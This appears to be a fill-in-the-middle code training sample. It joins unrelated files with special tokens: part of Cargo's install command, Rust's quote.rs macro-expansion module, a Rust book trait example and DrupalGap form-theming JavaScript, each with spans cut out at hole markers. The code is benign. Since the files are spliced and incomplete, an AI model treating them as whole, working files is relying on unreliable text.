order of precedence, by `--root`, `$CARGO_INSTALL_ROOT`, the `install.root`
configuration key, and finally the home directory (which is either
`$CARGO_HOME` if set or `$HOME/.cargo` by default).
There are multiple sources from which a crate can be installed. The default
location is crates.io but the `--git` and `--path` flags can change this source.
If the source contains more than one package (such as crates.io or a git
repository with multiple crates) the `<crate>` argument is required to indicate
which crate should be installed.
Crates from crates.io can optionally specify the version they wish to install
via the `--vers` flags, and similarly packages from git repositories can
optionally specify the branch, tag, or revision that should be installed. If a
crate has multiple binaries, the `--bin` argument can selectively install only
one of them, and if you'd rather install examples the `--example` argument can
be used as well.
The `--list` option will list all installed packages (and their versions).
";
pub fn execute(options: Options, config: &Config) -> CliResult<Option<()>> {
try!(config.shell().set_verbosity(options.flag_verbose, options.flag_quiet));
try!(config.shell().set_color_config(options.flag_color.as_ref().map(|s| &s[..])));
let compile_opts = ops::CompileOptions {
config: config,
jobs: options.flag_jobs,
target: None,
features: &options.flag_features,
no_default_features: options.flag_no_default_features,
spec: &[],
exec_engine: None,
mode: ops::CompileMode::Build,
release: !options.flag_debug,
filter: ops::CompileFilter::new(false, &options.flag_bin, &[],
&options.flag_example, &[]),
target_rustc_args: None,
};
let source = if let Some(url) = options.flag_git {
let url = try!(url.to_url().map_err(human));
let gitref = if let Some(branch) = options.flag_branch {
GitReference::Branch(branch)
} else if let Some(tag) = options.flag_tag {
GitReference::Tag(tag)
} else if let Some(rev) = options.flag_rev {
GitReference::Rev(rev)
} else {
GitReference::Branch("master".to_string())
};
SourceId::for_git(&url, gitref)
} else if let Some(path) = options.flag_path {
try!(SourceId::for_path(Path::new(&path)))
} else {
try!(SourceId::for_central(config))
};
let krate = options.arg_crate.as_ref().map(|s| &s[..]);
let vers = options.flag_vers.as_ref().map(|s| &s[..]);
let root = options.flag_root.as_ref().map(|s| &s[..]);
if options.flag_list {
try!(ops::install_list(root, config));
} else {
try!(ops::install(root, krate, &source, vers, &compile_opts));
}
Ok(None)
}<|fim▁end|> | |
<|file_name|>quote.rs<|end_file_name|><|fim▁begin|>// Copyright 2015 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
use ast;
use codemap::Span;
use ext::base::ExtCtxt;
use ext::base;
use ext::build::AstBuilder;
use parse::token::*;
use parse::token;
use ptr::P;
/// Quasiquoting works via token trees.
///
/// This is registered as a set of expression syntax extensions called
/// quote! that lift their argument token-tree to an AST representing the
/// construction of the same token tree, with token::SubstNt interpreted
/// as antiquotes (splices).
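/// For example (illustrative): inside a syntax extension one might write
/// `quote_expr!(cx, $lhs + $rhs)`, which expands to code rebuilding the
/// token tree `$lhs + $rhs` at runtime, splicing in the `ToTokens` output
/// of the local variables `lhs` and `rhs`.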
pub mod rt {
use ast;
use codemap::Spanned;
use ext::base::ExtCtxt;
use parse::token;
use parse;
use ptr::P;
use std::rc::Rc;
use ast::{TokenTree, Expr};
pub use parse::new_parser_from_tts;
pub use codemap::{BytePos, Span, dummy_spanned, DUMMY_SP};
pub trait ToTokens {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree>;
}
impl ToTokens for TokenTree {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec!(self.clone())
}
}
impl<T: ToTokens> ToTokens for Vec<T> {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
self.iter().flat_map(|t| t.to_tokens(cx).into_iter()).collect()
}
}
impl<T: ToTokens> ToTokens for Spanned<T> {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
// FIXME: use the span?
self.node.to_tokens(cx)
}
}
impl<T: ToTokens> ToTokens for Option<T> {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
match self {
&Some(ref t) => t.to_tokens(cx),
&None => Vec::new(),
}
}
}
impl ToTokens for ast::Ident {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(DUMMY_SP, token::Ident(*self, token::Plain))]
}
}
impl ToTokens for ast::Path {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(DUMMY_SP, token::Interpolated(token::NtPath(Box::new(self.clone()))))]
}
}
impl ToTokens for ast::Ty {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtTy(P(self.clone()))))]
}
}
impl ToTokens for ast::Block {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtBlock(P(self.clone()))))]
}
}
impl ToTokens for P<ast::Item> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtItem(self.clone())))]
}
}
impl ToTokens for P<ast::ImplItem> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtImplItem(self.clone())))]
}
}
impl ToTokens for P<ast::TraitItem> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtTraitItem(self.clone())))]
}
}
impl ToTokens for P<ast::Stmt> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtStmt(self.clone())))]
}
}
impl ToTokens for P<ast::Expr> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtExpr(self.clone())))]
}
}
impl ToTokens for P<ast::Pat> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(self.span, token::Interpolated(token::NtPat(self.clone())))]
}
}
impl ToTokens for ast::Arm {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(DUMMY_SP, token::Interpolated(token::NtArm(self.clone())))]
}
}
macro_rules! impl_to_tokens_slice {
($t: ty, $sep: expr) => {
impl ToTokens for [$t] {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let mut v = vec![];
for (i, x) in self.iter().enumerate() {
if i > 0 {
v.push_all(&$sep);
}
v.extend(x.to_tokens(cx));
}
v
}
}
};
}
impl_to_tokens_slice! { ast::Ty, [ast::TtToken(DUMMY_SP, token::Comma)] }
impl_to_tokens_slice! { P<ast::Item>, [] }
impl ToTokens for P<ast::MetaItem> {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtToken(DUMMY_SP, token::Interpolated(token::NtMeta(self.clone())))]
}
}
impl ToTokens for ast::Attribute {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let mut r = vec![];
// FIXME: The spans could be better
r.push(ast::TtToken(self.span, token::Pound));
if self.node.style == ast::AttrInner {
r.push(ast::TtToken(self.span, token::Not));
}
r.push(ast::TtDelimited(self.span, Rc::new(ast::Delimited {
delim: token::Bracket,
open_span: self.span,
tts: self.node.value.to_tokens(cx),
close_span: self.span,
})));
r
}
}
impl ToTokens for str {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let lit = ast::LitStr(
token::intern_and_get_ident(self), ast::CookedStr);
dummy_spanned(lit).to_tokens(cx)
}
}
impl ToTokens for () {
fn to_tokens(&self, _cx: &ExtCtxt) -> Vec<TokenTree> {
vec![ast::TtDelimited(DUMMY_SP, Rc::new(ast::Delimited {
delim: token::Paren,
open_span: DUMMY_SP,
tts: vec![],
close_span: DUMMY_SP,
}))]
}
}
impl ToTokens for ast::Lit {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
// FIXME: This is wrong
P(ast::Expr {
id: ast::DUMMY_NODE_ID,
node: ast::ExprLit(P(self.clone())),
span: DUMMY_SP,
}).to_tokens(cx)
}
}
impl ToTokens for bool {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
dummy_spanned(ast::LitBool(*self)).to_tokens(cx)
}
}
impl ToTokens for char {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
dummy_spanned(ast::LitChar(*self)).to_tokens(cx)
}
}
macro_rules! impl_to_tokens_int {
(signed, $t:ty, $tag:expr) => (
impl ToTokens for $t {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let lit = ast::LitInt(*self as u64, ast::SignedIntLit($tag,
ast::Sign::new(*self)));
dummy_spanned(lit).to_tokens(cx)
}
}
);
(unsigned, $t:ty, $tag:expr) => (
impl ToTokens for $t {
fn to_tokens(&self, cx: &ExtCtxt) -> Vec<TokenTree> {
let lit = ast::LitInt(*self as u64, ast::UnsignedIntLit($tag));
dummy_spanned(lit).to_tokens(cx)
}
}
);
}
impl_to_tokens_int! { signed, isize, ast::TyIs }
impl_to_tokens_int! { signed, i8, ast::TyI8 }
impl_to_tokens_int! { signed, i16, ast::TyI16 }
impl_to_tokens_int! { signed, i32, ast::TyI32 }
impl_to_tokens_int! { signed, i64, ast::TyI64 }
impl_to_tokens_int! { unsigned, usize, ast::TyUs }
impl_to_tokens_int! { unsigned, u8, ast::TyU8 }
impl_to_tokens_int! { unsigned, u16, ast::TyU16 }
impl_to_tokens_int! { unsigned, u32, ast::TyU32 }
impl_to_tokens_int! { unsigned, u64, ast::TyU64 }
pub trait ExtParseUtils {
fn parse_item(&self, s: String) -> P<ast::Item>;
fn parse_expr(&self, s: String) -> P<ast::Expr>;
fn parse_stmt(&self, s: String) -> P<ast::Stmt>;
fn parse_tts(&self, s: String) -> Vec<ast::TokenTree>;
}
impl<'a> ExtParseUtils for ExtCtxt<'a> {
fn parse_item(&self, s: String) -> P<ast::Item> {
parse::parse_item_from_source_str(
"<quote expansion>".to_string(),
s,
self.cfg(),
self.parse_sess()).expect("parse error")
}
fn parse_stmt(&self, s: String) -> P<ast::Stmt> {
parse::parse_stmt_from_source_str("<quote expansion>".to_string(),
s,
self.cfg(),
self.parse_sess()).expect("parse error")
}
fn parse_expr(&self, s: String) -> P<ast::Expr> {
parse::parse_expr_from_source_str("<quote expansion>".to_string(),
s,
self.cfg(),
self.parse_sess())
}
fn parse_tts(&self, s: String) -> Vec<ast::TokenTree> {
parse::parse_tts_from_source_str("<quote expansion>".to_string(),
s,
self.cfg(),
self.parse_sess())
}
}
}
pub fn expand_quote_tokens<'cx>(cx: &'cx mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'cx> {
let (cx_expr, expr) = expand_tts(cx, sp, tts);
let expanded = expand_wrapper(cx, sp, cx_expr, expr, &[&["syntax", "ext", "quote", "rt"]]);
base::MacEager::expr(expanded)
}
pub fn expand_quote_expr<'cx>(cx: &'cx mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'cx> {
let expanded = expand_parse_call(cx, sp, "parse_expr", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_item<'cx>(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'cx> {
let expanded = expand_parse_call(cx, sp, "parse_item", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_pat<'cx>(cx: &'cx mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'cx> {
let expanded = expand_parse_call(cx, sp, "parse_pat", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_arm(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let expanded = expand_parse_call(cx, sp, "parse_arm", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_ty(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let expanded = expand_parse_call(cx, sp, "parse_ty", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_stmt(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let expanded = expand_parse_call(cx, sp, "parse_stmt", vec!(), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_attr(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let expanded = expand_parse_call(cx, sp, "parse_attribute",
vec!(cx.expr_bool(sp, true)), tts);
base::MacEager::expr(expanded)
}
pub fn expand_quote_matcher(cx: &mut ExtCtxt,
sp: Span,
tts: &[ast::TokenTree])
-> Box<base::MacResult+'static> {
let (cx_expr, tts) = parse_arguments_to_quote(cx, tts);
let mut vector = mk_stmts_let(cx, sp);
vector.extend(statements_mk_tts(cx, &tts[..], true).into_iter());
let block = cx.expr_block(
cx.block_all(sp,
vector,
Some(cx.expr_ident(sp, id_ext("tt")))));
let expanded = expand_wrapper(cx, sp, cx_expr, block, &[&["syntax", "ext", "quote", "rt"]]);
base::MacEager::expr(expanded)
}
fn ids_ext(strs: Vec<String> ) -> Vec<ast::Ident> {
strs.iter().map(|str| str_to_ident(&(*str))).collect()
}
fn id_ext(str: &str) -> ast::Ident {
str_to_ident(str)
}
// Lift an ident to the expr that evaluates to that ident.
fn mk_ident(cx: &ExtCtxt, sp: Span, ident: ast::Ident) -> P<ast::Expr> {
let e_str = cx.expr_str(sp, token::get_ident(ident));
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("ident_of"),
vec!(e_str))
}
// Lift a name to the expr that evaluates to that name
fn mk_name(cx: &ExtCtxt, sp: Span, ident: ast::Ident) -> P<ast::Expr> {
let e_str = cx.expr_str(sp, token::get_ident(ident));
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("name_of"),
vec!(e_str))
}
fn mk_ast_path(cx: &ExtCtxt, sp: Span, name: &str) -> P<ast::Expr> {
let idents = vec!(id_ext("syntax"), id_ext("ast"), id_ext(name));
cx.expr_path(cx.path_global(sp, idents))
}
fn mk_token_path(cx: &ExtCtxt, sp: Span, name: &str) -> P<ast::Expr> {
let idents = vec!(id_ext("syntax"), id_ext("parse"), id_ext("token"), id_ext(name));
cx.expr_path(cx.path_global(sp, idents))
}
fn mk_binop(cx: &ExtCtxt, sp: Span, bop: token::BinOpToken) -> P<ast::Expr> {
let name = match bop {
token::Plus => "Plus",
token::Minus => "Minus",
token::Star => "Star",
token::Slash => "Slash",
token::Percent => "Percent",
token::Caret => "Caret",
token::And => "And",
token::Or => "Or",
token::Shl => "Shl",
token::Shr => "Shr"
};
mk_token_path(cx, sp, name)
}
fn mk_delim(cx: &ExtCtxt, sp: Span, delim: token::DelimToken) -> P<ast::Expr> {
let name = match delim {
token::Paren => "Paren",
token::Bracket => "Bracket",
token::Brace => "Brace",
};
mk_token_path(cx, sp, name)
}
#[allow(non_upper_case_globals)]
fn expr_mk_token(cx: &ExtCtxt, sp: Span, tok: &token::Token) -> P<ast::Expr> {
macro_rules! mk_lit {
($name: expr, $suffix: expr, $($args: expr),*) => {{
let inner = cx.expr_call(sp, mk_token_path(cx, sp, $name), vec![$($args),*]);
let suffix = match $suffix {
Some(name) => cx.expr_some(sp, mk_name(cx, sp, ast::Ident::new(name))),
None => cx.expr_none(sp)
};
cx.expr_call(sp, mk_token_path(cx, sp, "Literal"), vec![inner, suffix])
}}
}
match *tok {
token::BinOp(binop) => {
return cx.expr_call(sp, mk_token_path(cx, sp, "BinOp"), vec!(mk_binop(cx, sp, binop)));
}
token::BinOpEq(binop) => {
return cx.expr_call(sp, mk_token_path(cx, sp, "BinOpEq"),
vec!(mk_binop(cx, sp, binop)));
}
token::OpenDelim(delim) => {
return cx.expr_call(sp, mk_token_path(cx, sp, "OpenDelim"),
vec![mk_delim(cx, sp, delim)]);
}
token::CloseDelim(delim) => {
return cx.expr_call(sp, mk_token_path(cx, sp, "CloseDelim"),
vec![mk_delim(cx, sp, delim)]);
}
token::Literal(token::Byte(i), suf) => {
let e_byte = mk_name(cx, sp, i.ident());
return mk_lit!("Byte", suf, e_byte);
}
token::Literal(token::Char(i), suf) => {
let e_char = mk_name(cx, sp, i.ident());
return mk_lit!("Char", suf, e_char);
}
token::Literal(token::Integer(i), suf) => {
let e_int = mk_name(cx, sp, i.ident());
return mk_lit!("Integer", suf, e_int);
}
token::Literal(token::Float(fident), suf) => {
let e_fident = mk_name(cx, sp, fident.ident());
return mk_lit!("Float", suf, e_fident);
}
token::Literal(token::Str_(ident), suf) => {
return mk_lit!("Str_", suf, mk_name(cx, sp, ident.ident()))
}
token::Literal(token::StrRaw(ident, n), suf) => {
return mk_lit!("StrRaw", suf, mk_name(cx, sp, ident.ident()), cx.expr_usize(sp, n))
}
token::Ident(ident, style) => {
return cx.expr_call(sp,
mk_token_path(cx, sp, "Ident"),
vec![mk_ident(cx, sp, ident),
match style {
ModName => mk_token_path(cx, sp, "ModName"),
Plain => mk_token_path(cx, sp, "Plain"),
}]);
}
token::Lifetime(ident) => {
return cx.expr_call(sp,
mk_token_path(cx, sp, "Lifetime"),
vec!(mk_ident(cx, sp, ident)));
}
token::DocComment(ident) => {
return cx.expr_call(sp,
mk_token_path(cx, sp, "DocComment"),
vec!(mk_name(cx, sp, ident.ident())));
}
token::MatchNt(name, kind, namep, kindp) => {
return cx.expr_call(sp,
mk_token_path(cx, sp, "MatchNt"),
vec!(mk_ident(cx, sp, name),
mk_ident(cx, sp, kind),
match namep {
ModName => mk_token_path(cx, sp, "ModName"),
Plain => mk_token_path(cx, sp, "Plain"),
},
match kindp {
ModName => mk_token_path(cx, sp, "ModName"),
Plain => mk_token_path(cx, sp, "Plain"),
}));
}
token::Interpolated(_) => panic!("quote! with interpolated token"),
_ => ()
}
let name = match *tok {
token::Eq => "Eq",
token::Lt => "Lt",
token::Le => "Le",
token::EqEq => "EqEq",
token::Ne => "Ne",
token::Ge => "Ge",
token::Gt => "Gt",
token::AndAnd => "AndAnd",
token::OrOr => "OrOr",
token::Not => "Not",
token::Tilde => "Tilde",
token::At => "At",
token::Dot => "Dot",
token::DotDot => "DotDot",
token::Comma => "Comma",
token::Semi => "Semi",
token::Colon => "Colon",
token::ModSep => "ModSep",
token::RArrow => "RArrow",
token::LArrow => "LArrow",
token::FatArrow => "FatArrow",
token::Pound => "Pound",
token::Dollar => "Dollar",
token::Question => "Question",
token::Underscore => "Underscore",
token::Eof => "Eof",
_ => panic!("unhandled token in quote!"),
};
mk_token_path(cx, sp, name)
}
fn statements_mk_tt(cx: &ExtCtxt, tt: &ast::TokenTree, matcher: bool) -> Vec<P<ast::Stmt>> {
match *tt {
ast::TtToken(sp, SubstNt(ident, _)) => {
// tt.extend($ident.to_tokens(ext_cx).into_iter())
let e_to_toks =
cx.expr_method_call(sp,
cx.expr_ident(sp, ident),
id_ext("to_tokens"),
vec!(cx.expr_ident(sp, id_ext("ext_cx"))));
let e_to_toks =
cx.expr_method_call(sp, e_to_toks, id_ext("into_iter"), vec![]);
let e_push =
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("tt")),
id_ext("extend"),
vec!(e_to_toks));
vec!(cx.stmt_expr(e_push))
}
ref tt @ ast::TtToken(_, MatchNt(..)) if !matcher => {
let mut seq = vec![];
for i in 0..tt.len() {
seq.push(tt.get_tt(i));
}
statements_mk_tts(cx, &seq[..], matcher)
}
ast::TtToken(sp, ref tok) => {
let e_sp = cx.expr_ident(sp, id_ext("_sp"));
let e_tok = cx.expr_call(sp,
mk_ast_path(cx, sp, "TtToken"),
vec!(e_sp, expr_mk_token(cx, sp, tok)));
let e_push =
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("tt")),
id_ext("push"),
vec!(e_tok));
vec!(cx.stmt_expr(e_push))
},
ast::TtDelimited(_, ref delimed) => {
statements_mk_tt(cx, &delimed.open_tt(), matcher).into_iter()
.chain(delimed.tts.iter()
.flat_map(|tt| statements_mk_tt(cx, tt, matcher).into_iter()))
.chain(statements_mk_tt(cx, &delimed.close_tt(), matcher).into_iter())
.collect()
},
ast::TtSequence(sp, ref seq) => {
if !matcher {
panic!("TtSequence in quote!");
}
let e_sp = cx.expr_ident(sp, id_ext("_sp"));
let stmt_let_tt = cx.stmt_let(sp, true, id_ext("tt"), cx.expr_vec_ng(sp));
let mut tts_stmts = vec![stmt_let_tt];
tts_stmts.extend(statements_mk_tts(cx, &seq.tts[..], matcher).into_iter());
let e_tts = cx.expr_block(cx.block(sp, tts_stmts,
Some(cx.expr_ident(sp, id_ext("tt")))));
let e_separator = match seq.separator {
Some(ref sep) => cx.expr_some(sp, expr_mk_token(cx, sp, sep)),
None => cx.expr_none(sp),
};
let e_op = match seq.op {
ast::ZeroOrMore => mk_ast_path(cx, sp, "ZeroOrMore"),
ast::OneOrMore => mk_ast_path(cx, sp, "OneOrMore"),
};
let fields = vec![cx.field_imm(sp, id_ext("tts"), e_tts),
cx.field_imm(sp, id_ext("separator"), e_separator),
cx.field_imm(sp, id_ext("op"), e_op),
cx.field_imm(sp, id_ext("num_captures"),
cx.expr_usize(sp, seq.num_captures))];
let seq_path = vec![id_ext("syntax"), id_ext("ast"), id_ext("SequenceRepetition")];
let e_seq_struct = cx.expr_struct(sp, cx.path_global(sp, seq_path), fields);
let e_rc_new = cx.expr_call_global(sp, vec![id_ext("std"),
id_ext("rc"),
id_ext("Rc"),
id_ext("new")],
vec![e_seq_struct]);
let e_tok = cx.expr_call(sp,
mk_ast_path(cx, sp, "TtSequence"),
vec!(e_sp, e_rc_new));
let e_push =
cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("tt")),
id_ext("push"),
vec!(e_tok));
vec!(cx.stmt_expr(e_push))
}
}
}
fn parse_arguments_to_quote(cx: &ExtCtxt, tts: &[ast::TokenTree])
-> (P<ast::Expr>, Vec<ast::TokenTree>) {
// NB: It appears that the main parser loses its mind if we consider
// $foo as a SubstNt during the main parse, so we have to re-parse
// under quote_depth > 0. This is silly and should go away; the _guess_ is
// it has to do with transition away from supporting old-style macros, so
// try removing it when enough of them are gone.
let mut p = cx.new_parser_from_tts(tts);
p.quote_depth += 1;
let cx_expr = p.parse_expr();
if !panictry!(p.eat(&token::Comma)) {
panic!(p.fatal("expected token `,`"));
}
let tts = panictry!(p.parse_all_token_trees());
p.abort_if_errors();
(cx_expr, tts)
}
fn mk_stmts_let(cx: &ExtCtxt, sp: Span) -> Vec<P<ast::Stmt>> {
// We also bind a single value, sp, to ext_cx.call_site()
//
// This causes every span in a token-tree quote to be attributed to the
// call site of the extension using the quote. We can't really do much
// better since the source of the quote may well be in a library that
// was not even parsed by this compilation run, that the user has no
// source code for (e.g. in libsyntax, which they're just _using_).
//
// The old quasiquoter had an elaborate mechanism for denoting input
// file locations from which quotes originated; unfortunately this
// relied on feeding the source string of the quote back into the
// compiler (which we don't really want to do) and, in any case, only
// pushed the problem a very small step further back: an error
// resulting from parsing the quoted code is still attributed to
// the site where the string literal occurred, which was in a source file
// _other_ than the one the user has control over. For example, an
// error in a quote from the protocol compiler, invoked in user code
// using macro_rules! for example, will be attributed to the macro_rules.rs
// file in libsyntax, which the user might not even have source to (unless
// they happen to have a compiler on hand). Overall, the phase distinction
// just makes quotes "hard to attribute". Possibly this could be fixed
// by recreating some of the original qq machinery in the tt regime
// (pushing fake FileMaps onto the parser to account for original sites
// of quotes, for example) but at this point it seems not likely to be
// worth the hassle.
let e_sp = cx.expr_method_call(sp,
cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("call_site"),
Vec::new());
let stmt_let_sp = cx.stmt_let(sp, false,
id_ext("_sp"),
e_sp);<|fim▁hole|>
vec!(stmt_let_sp, stmt_let_tt)
}
fn statements_mk_tts(cx: &ExtCtxt, tts: &[ast::TokenTree], matcher: bool) -> Vec<P<ast::Stmt>> {
let mut ss = Vec::new();
for tt in tts {
ss.extend(statements_mk_tt(cx, tt, matcher).into_iter());
}
ss
}
fn expand_tts(cx: &ExtCtxt, sp: Span, tts: &[ast::TokenTree])
-> (P<ast::Expr>, P<ast::Expr>) {
let (cx_expr, tts) = parse_arguments_to_quote(cx, tts);
let mut vector = mk_stmts_let(cx, sp);
vector.extend(statements_mk_tts(cx, &tts[..], false).into_iter());
let block = cx.expr_block(
cx.block_all(sp,
vector,
Some(cx.expr_ident(sp, id_ext("tt")))));
(cx_expr, block)
}
fn expand_wrapper(cx: &ExtCtxt,
sp: Span,
cx_expr: P<ast::Expr>,
expr: P<ast::Expr>,
imports: &[&[&str]]) -> P<ast::Expr> {
// Explicitly borrow to avoid moving from the invoker (#16992)
let cx_expr_borrow = cx.expr_addr_of(sp, cx.expr_deref(sp, cx_expr));
let stmt_let_ext_cx = cx.stmt_let(sp, false, id_ext("ext_cx"), cx_expr_borrow);
let stmts = imports.iter().map(|path| {
// make item: `use ...;`
let path = path.iter().map(|s| s.to_string()).collect();
cx.stmt_item(sp, cx.item_use_glob(sp, ast::Inherited, ids_ext(path)))
}).chain(Some(stmt_let_ext_cx).into_iter()).collect();
cx.expr_block(cx.block_all(sp, stmts, Some(expr)))
}
fn expand_parse_call(cx: &ExtCtxt,
sp: Span,
parse_method: &str,
arg_exprs: Vec<P<ast::Expr>> ,
tts: &[ast::TokenTree]) -> P<ast::Expr> {
let (cx_expr, tts_expr) = expand_tts(cx, sp, tts);
let cfg_call = || cx.expr_method_call(
sp, cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("cfg"), Vec::new());
let parse_sess_call = || cx.expr_method_call(
sp, cx.expr_ident(sp, id_ext("ext_cx")),
id_ext("parse_sess"), Vec::new());
let new_parser_call =
cx.expr_call(sp,
cx.expr_ident(sp, id_ext("new_parser_from_tts")),
vec!(parse_sess_call(), cfg_call(), tts_expr));
let expr = cx.expr_method_call(sp, new_parser_call, id_ext(parse_method),
arg_exprs);
if parse_method == "parse_attribute" {
expand_wrapper(cx, sp, cx_expr, expr, &[&["syntax", "ext", "quote", "rt"],
&["syntax", "parse", "attr"]])
} else {
expand_wrapper(cx, sp, cx_expr, expr, &[&["syntax", "ext", "quote", "rt"]])
}
}<|fim▁end|> |
let stmt_let_tt = cx.stmt_let(sp, true, id_ext("tt"), cx.expr_vec_ng(sp)); |
<|file_name|>main.rs<|end_file_name|><|fim▁begin|>use std::fmt;
trait OutlinePrint: fmt::Display {
fn outline_print(&self) {
let output = self.to_string();
let len = output.len();
println!("{}", "*".repeat(len + 4));
println!("*{}*", " ".repeat(len + 2));
println!("* {} *", output);
println!("*{}*", " ".repeat(len + 2));
println!("{}", "*".repeat(len + 4));
}
}
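// Note: `OutlinePrint` can only be implemented for types that also implement
// the `fmt::Display` supertrait. A minimal sketch of such an impl for `Point`
// (illustrative; not part of the original listing):
//
// impl fmt::Display for Point {
//     fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
//         write!(f, "({}, {})", self.x, self.y)
//     }
// }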
// ANCHOR: here
struct Point {
x: i32,
y: i32,
}
impl OutlinePrint for Point {}
// ANCHOR_END: here
fn main() {
let p = Point { x: 1, y: 3 };
p.outline_print();<|fim▁hole|><|fim▁end|> | } |
<|file_name|>form.theme.inc.js<|end_file_name|><|fim▁begin|>/**
* Themes a checkbox input.
* @param {Object} variables
* @return {String}
*/<|fim▁hole|> if (variables.checked) {
variables.attributes.checked = 'checked';
}
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_checkbox - ' + error); }
}
/**
* Themes checkboxes input.
* @param {Object} variables
* @return {String}
*/
function theme_checkboxes(variables) {
try {
var html = '';
variables.attributes.type = 'checkboxes';
for (var value in variables.options) {
if (!variables.options.hasOwnProperty(value)) { continue; }
var label = variables.options[value];
if (value == 'attributes') { continue; } // Skip attributes.
var _label = value;
if (!empty(label)) { _label = label; }
var checkbox = {
value: value,
attributes: {
name: variables.name + '[' + value + ']',
'class': variables.name,
value: value
}
};
if (variables.value && variables.value[value]) {
checkbox.checked = true;
}
// Use _label so an empty label falls back to the option's value.
html += '<label>' +
theme('checkbox', checkbox) + ' ' + _label +
'</label>';
}
// Check the box?
/*if (variables.checked) {
variables.attributes.checked = 'checked';
}*/
return html;
}
catch (error) { console.log('theme_checkboxes - ' + error); }
}
/**
* Themes an email input.
* @param {Object} variables
* @return {String}
*/
function theme_email(variables) {
try {
variables.attributes.type = 'email';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_email - ' + error); }
}
/**
* Themes a file input.
* @param {Object} variables
* @return {String}
*/
function theme_file(variables) {
try {
variables.attributes.type = 'file';
var output = '<input ' + drupalgap_attributes(variables.attributes) + ' />';
return output;
}
catch (error) { console.log('theme_file - ' + error); }
}
/**
* Themes a form element label.
* @param {Object} variables
* @return {String}
*/
function theme_form_element_label(variables) {
try {
var element = variables.element;
if (empty(element.title)) { return ''; }
// Elements with a title_placeholder set to true are expected to surface their title via the input's placeholder attribute instead.
// By default, use the element id as the label's "for" target, unless the element is
// a radio, in which case use the name.
var label_for = '';
if (element.id) { label_for = element.id; }
else if (element.attributes && element.attributes['for']) {
label_for = element.attributes['for'];
}
if (element.type == 'radios') { label_for = element.name; }
// Render the label.
var html =
'<label for="' + label_for + '"><strong>' + element.title + '</strong>';
if (element.required) { html += theme('form_required_marker', { }); }
html += '</label>';
return html;
}
catch (error) { console.log('theme_form_element_label - ' + error); }
}
/**
* Themes a marker for a required form element label.
* @param {Object} variables
* @return {String}
*/
